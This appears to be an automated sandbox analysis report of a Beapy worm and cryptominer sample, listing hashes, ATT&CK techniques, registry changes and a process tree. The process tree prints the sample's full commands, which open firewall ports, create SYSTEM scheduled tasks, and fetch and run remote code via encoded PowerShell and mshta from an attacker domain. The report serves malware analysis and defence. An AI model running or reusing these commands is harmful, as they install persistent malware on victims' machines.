beapy | e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d

Analysis

max time kernel
150s
max time network
151s
platform
windows7_x64
resource
win7v20201028
submitted
05-04-2021 09:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe
Size

6.6MB
MD5

5a59ce4c687a7f855f1079dc98f71170
SHA1

3198daca631983b3301c3ce88961ee7bbcafc222
SHA256

e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d
SHA512

bddc8f9143a060be9517dfe8cf863c37f0ad05900a1a4daef5ee86473701f56997f34949aeb003533ad823f892afd4f0cfeef4f8dfdc3de31a0d9d0ffab09e25

Score

10^/10

beapy evasion miner worm

Malware Config

Signatures

Beapy
Beapy is a python worm with crypto mining capabilities.
miner worm beapy
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Loads dropped DLL 19 IoCs

pid	Process
1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe
1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe
1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe
1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe
1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe
1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe
1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe
1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe
1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe
1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe
1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe
1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe
1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe
1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe
1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe
1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe
1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe
1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe
1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	\??\c:\windows\oYpvHO.exe	cmd.exe
File opened for modification	\??\c:\windows\oYpvHO.exe	cmd.exe
File created	\??\c:\windows\oGXmEN.exe	cmd.exe
File opened for modification	\??\c:\windows\oGXmEN.exe	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 6 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1648	schtasks.exe
1536	schtasks.exe
1244	schtasks.exe
968	schtasks.exe
316	schtasks.exe
1532	schtasks.exe

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
556	ipconfig.exe
996	ipconfig.exe
1944	netstat.exe

Modifies data under HKEY_USERS 42 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	WScript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection"	netsh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	cmd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	WScript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	WScript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	cmd.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies."	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	WScript.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{35786D3C-B075-49B9-88DD-029876E11C01} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 0100000000000000604c2d920f2ad701	WScript.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	cmd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	cmd.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP"	netsh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	cmd.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{B155BDF8-02F0-451E-9A26-AE317CFD7779} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 0100000000000000e0d136920f2ad701	WScript.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party"	netsh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	WScript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	cmd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	WScript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	WScript.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
1500	powershell.exe
1500	powershell.exe
1500	powershell.exe
1500	powershell.exe
1500	powershell.exe
1500	powershell.exe
1500	powershell.exe
1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe

Suspicious use of AdjustPrivilegeToken 42 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	900	WMIC.exe
Token: SeSecurityPrivilege	900	WMIC.exe
Token: SeTakeOwnershipPrivilege	900	WMIC.exe
Token: SeLoadDriverPrivilege	900	WMIC.exe
Token: SeSystemProfilePrivilege	900	WMIC.exe
Token: SeSystemtimePrivilege	900	WMIC.exe
Token: SeProfSingleProcessPrivilege	900	WMIC.exe
Token: SeIncBasePriorityPrivilege	900	WMIC.exe
Token: SeCreatePagefilePrivilege	900	WMIC.exe
Token: SeBackupPrivilege	900	WMIC.exe
Token: SeRestorePrivilege	900	WMIC.exe
Token: SeShutdownPrivilege	900	WMIC.exe
Token: SeDebugPrivilege	900	WMIC.exe
Token: SeSystemEnvironmentPrivilege	900	WMIC.exe
Token: SeRemoteShutdownPrivilege	900	WMIC.exe
Token: SeUndockPrivilege	900	WMIC.exe
Token: SeManageVolumePrivilege	900	WMIC.exe
Token: 33	900	WMIC.exe
Token: 34	900	WMIC.exe
Token: 35	900	WMIC.exe
Token: SeIncreaseQuotaPrivilege	900	WMIC.exe
Token: SeSecurityPrivilege	900	WMIC.exe
Token: SeTakeOwnershipPrivilege	900	WMIC.exe
Token: SeLoadDriverPrivilege	900	WMIC.exe
Token: SeSystemProfilePrivilege	900	WMIC.exe
Token: SeSystemtimePrivilege	900	WMIC.exe
Token: SeProfSingleProcessPrivilege	900	WMIC.exe
Token: SeIncBasePriorityPrivilege	900	WMIC.exe
Token: SeCreatePagefilePrivilege	900	WMIC.exe
Token: SeBackupPrivilege	900	WMIC.exe
Token: SeRestorePrivilege	900	WMIC.exe
Token: SeShutdownPrivilege	900	WMIC.exe
Token: SeDebugPrivilege	900	WMIC.exe
Token: SeSystemEnvironmentPrivilege	900	WMIC.exe
Token: SeRemoteShutdownPrivilege	900	WMIC.exe
Token: SeUndockPrivilege	900	WMIC.exe
Token: SeManageVolumePrivilege	900	WMIC.exe
Token: 33	900	WMIC.exe
Token: 34	900	WMIC.exe
Token: 35	900	WMIC.exe
Token: SeDebugPrivilege	1500	powershell.exe
Token: SeDebugPrivilege	1944	netstat.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 548 wrote to memory of 1740	548	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe	27
PID 548 wrote to memory of 1740	548	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe	27
PID 548 wrote to memory of 1740	548	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe	27
PID 548 wrote to memory of 1740	548	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe	27
PID 1740 wrote to memory of 624	1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe	31
PID 1740 wrote to memory of 624	1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe	31
PID 1740 wrote to memory of 624	1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe	31
PID 1740 wrote to memory of 624	1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe	31
PID 624 wrote to memory of 900	624	cmd.exe	32
PID 624 wrote to memory of 900	624	cmd.exe	32
PID 624 wrote to memory of 900	624	cmd.exe	32
PID 624 wrote to memory of 900	624	cmd.exe	32
PID 1740 wrote to memory of 1168	1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe	34
PID 1740 wrote to memory of 1168	1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe	34
PID 1740 wrote to memory of 1168	1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe	34
PID 1740 wrote to memory of 1168	1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe	34
PID 1168 wrote to memory of 1512	1168	cmd.exe	35
PID 1168 wrote to memory of 1512	1168	cmd.exe	35
PID 1168 wrote to memory of 1512	1168	cmd.exe	35
PID 1168 wrote to memory of 1512	1168	cmd.exe	35
PID 1512 wrote to memory of 1992	1512	net.exe	36
PID 1512 wrote to memory of 1992	1512	net.exe	36
PID 1512 wrote to memory of 1992	1512	net.exe	36
PID 1512 wrote to memory of 1992	1512	net.exe	36
PID 1740 wrote to memory of 1604	1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe	37
PID 1740 wrote to memory of 1604	1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe	37
PID 1740 wrote to memory of 1604	1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe	37
PID 1740 wrote to memory of 1604	1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe	37
PID 1604 wrote to memory of 316	1604	cmd.exe	38
PID 1604 wrote to memory of 316	1604	cmd.exe	38
PID 1604 wrote to memory of 316	1604	cmd.exe	38
PID 1604 wrote to memory of 316	1604	cmd.exe	38
PID 316 wrote to memory of 1444	316	net.exe	39
PID 316 wrote to memory of 1444	316	net.exe	39
PID 316 wrote to memory of 1444	316	net.exe	39
PID 316 wrote to memory of 1444	316	net.exe	39
PID 1740 wrote to memory of 1500	1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe	40
PID 1740 wrote to memory of 1500	1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe	40
PID 1740 wrote to memory of 1500	1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe	40
PID 1740 wrote to memory of 1500	1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe	40
PID 1740 wrote to memory of 1516	1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe	41
PID 1740 wrote to memory of 1516	1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe	41
PID 1740 wrote to memory of 1516	1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe	41
PID 1740 wrote to memory of 1516	1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe	41
PID 1516 wrote to memory of 556	1516	cmd.exe	42
PID 1516 wrote to memory of 556	1516	cmd.exe	42
PID 1516 wrote to memory of 556	1516	cmd.exe	42
PID 1516 wrote to memory of 556	1516	cmd.exe	42
PID 1740 wrote to memory of 996	1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe	43
PID 1740 wrote to memory of 996	1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe	43
PID 1740 wrote to memory of 996	1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe	43
PID 1740 wrote to memory of 996	1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe	43
PID 1740 wrote to memory of 1944	1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe	44
PID 1740 wrote to memory of 1944	1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe	44
PID 1740 wrote to memory of 1944	1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe	44
PID 1740 wrote to memory of 1944	1740	e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe	44
PID 2036 wrote to memory of 2840	2036	uhMQsOHI.exe	47
PID 2036 wrote to memory of 2840	2036	uhMQsOHI.exe	47
PID 2036 wrote to memory of 2840	2036	uhMQsOHI.exe	47
PID 2036 wrote to memory of 2840	2036	uhMQsOHI.exe	47
PID 2840 wrote to memory of 2848	2840	cmd.exe	49
PID 2840 wrote to memory of 2848	2840	cmd.exe	49
PID 2840 wrote to memory of 2848	2840	cmd.exe	49
PID 2840 wrote to memory of 2848	2840	cmd.exe	49

C:\Users\Admin\AppData\Local\Temp\e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe
"C:\Users\Admin\AppData\Local\Temp\e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:548
- C:\Users\Admin\AppData\Local\Temp\e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe
  "C:\Users\Admin\AppData\Local\Temp\e3a3ce745bced26cd26d5d219e75dfb281738e2545ffc45cc91d19da9d21c73d.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1740
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c wmic ntdomain get domainname
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:624
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic ntdomain get domainname
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:900
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c net localgroup administrators
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1168
  - - C:\Windows\SysWOW64\net.exe
      net localgroup administrators
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1512
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators
        5⤵
        
        PID:1992
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c net group "domain admins" /domain
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1604
  - - C:\Windows\SysWOW64\net.exe
      net group "domain admins" /domain
      4⤵
      Suspicious use of WriteProcessMemory
      PID:316
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 group "domain admins" /domain
        5⤵
        
        PID:1444
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe -exec bypass "import-module C:\Users\Admin\AppData\Local\Temp\m2.ps1"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1500
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ipconfig /all
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1516
  - - C:\Windows\SysWOW64\ipconfig.exe
      ipconfig /all
      4⤵
      Gathers network information
      PID:556
- - C:\Windows\SysWOW64\ipconfig.exe
    ipconfig /all
    3⤵
    - Gathers network information
    PID:996
- - C:\Windows\SysWOW64\netstat.exe
    netstat -na
    3⤵
    - Gathers network information
    - Suspicious use of AdjustPrivilegeToken
    PID:1944

C:\Windows\uhMQsOHI.exe
C:\Windows\uhMQsOHI.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:2036
- C:\Windows\SysWOW64\cmd.exe
  cmd /c call "c:\windows\temp\tmp.vbs"
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of WriteProcessMemory
  PID:2840
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"
    3⤵
    - Modifies data under HKEY_USERS
    PID:2848
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c echo diav >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&copy /y c:\windows\temp\svchost.exe c:\windows\oYpvHO.exe&move /y c:\windows\temp\dig.exe c:\windows\nNGnDVGA.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn oYpvHO /tr "C:\Windows\oYpvHO.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\IwkZQaS" /tr "c:\windows\nNGnDVGA.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pTUICJFPF"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\nNGnDVGA.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\oYpvHO.exe"&schtasks /run /TN escan)
      4⤵
      Drops file in Windows directory
      PID:2892
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add portopening tcp 65533 DNSd
        5⤵
        Modifies data under HKEY_USERS
        
        PID:2976
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
        5⤵
        Modifies data under HKEY_USERS
        
        PID:2920
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F
        5⤵
        Creates scheduled task(s)
        
        PID:1244
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn oYpvHO /tr "C:\Windows\oYpvHO.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:968
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\IwkZQaS" /tr "c:\windows\nNGnDVGA.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:316

C:\Windows\iqgLveXc.exe
C:\Windows\iqgLveXc.exe
1⤵
PID:2792
- C:\Windows\SysWOW64\cmd.exe
  cmd /c call "c:\windows\temp\tmp.vbs"
  2⤵
  - Modifies data under HKEY_USERS
  PID:3052
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"
    3⤵
    - Modifies data under HKEY_USERS
    PID:920
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c echo nhajS >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\hash.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&copy /y c:\windows\temp\svchost.exe c:\windows\oGXmEN.exe&move /y c:\windows\temp\dig.exe c:\windows\xaizGkJb.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn oGXmEN /tr "C:\Windows\oGXmEN.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\olZekr" /tr "c:\windows\xaizGkJb.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pTUICJFPF"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\xaizGkJb.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\oGXmEN.exe"&schtasks /run /TN escan)
      4⤵
      Drops file in Windows directory
      PID:1556
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add portopening tcp 65533 DNSd
        5⤵
        Modifies data under HKEY_USERS
        
        PID:900
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
        5⤵
        Modifies data under HKEY_USERS
        
        PID:1944
